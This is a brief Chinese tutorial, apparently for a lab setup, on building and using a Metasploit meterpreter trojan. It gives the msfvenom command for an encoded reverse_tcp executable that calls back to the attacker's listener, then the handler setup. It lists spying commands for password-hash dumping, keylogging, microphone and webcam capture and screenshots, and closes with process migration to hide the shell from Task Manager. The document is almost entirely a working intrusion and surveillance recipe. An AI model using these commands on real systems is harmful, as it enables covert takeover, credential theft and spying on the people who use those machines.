meterpreter木马生成和利用
木马生成
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.188.5 lport=5555 -f exe > shell.exe
lhost 本地ip
lport 本地端口
命令完成后,会在当前目录下生成一个shell.exe可执行文件。
木马利用
获取Shell
先打开数据库服务:
service postgresql start
进入msf控制台:
msfconsole
选择攻击模块:
use exploit/multi/handler
选择payload:
set payload windows/meterpreter/reverse_tcp
show options
查看需要配置的参数
设置上述生成木马时填写的ip和端口:
set lhost [本地ip]
set lport [本地端口]
执行:
run
然后就等待靶机的上线了:
打开xp靶机,运行我们生成的shell,然后控制端就会进入:
meterpreter >
然后我们就可以输入攻击指令了,比如shell,可以进入xp靶机的cmd命令模式。
常用攻击指令
以下给出一些常用的meterpreter攻击指令:
help 帮助
ps 查看进程
kill [pid] 杀死进程
可以通过ls、cd、cat等进行文件管理
hashdump 账号密码MD5
getuid 当前用户
sysinfo 系统信息
record_mic 记录麦克风
webcam_chat
webcam_list
webcam_snap 摄像头拍照
webcam_stream
keyscan_start 记录键盘
keyscan_dump 输出键盘记录
screenshot 截屏
后台运行
在meterpreter界面可以用以下指令把当前shell放到后台,然后通过run继续获得其他靶机的shell:
meterpreter > backgroud 把当前shell移到后台
msf exploit(handler) > sessions 查看所有后台
msf exploit(handler) > sessions [id] 进入指定id的后台
进程注入
注入其他进程:
先用ps查看所有进程的pid,然后输入命令migrate [pid] 将shell进程注入到其他指定进程,这样在任务管理器里就看不到我们的shell.exe了,它会跟随被注入的进程一直运行。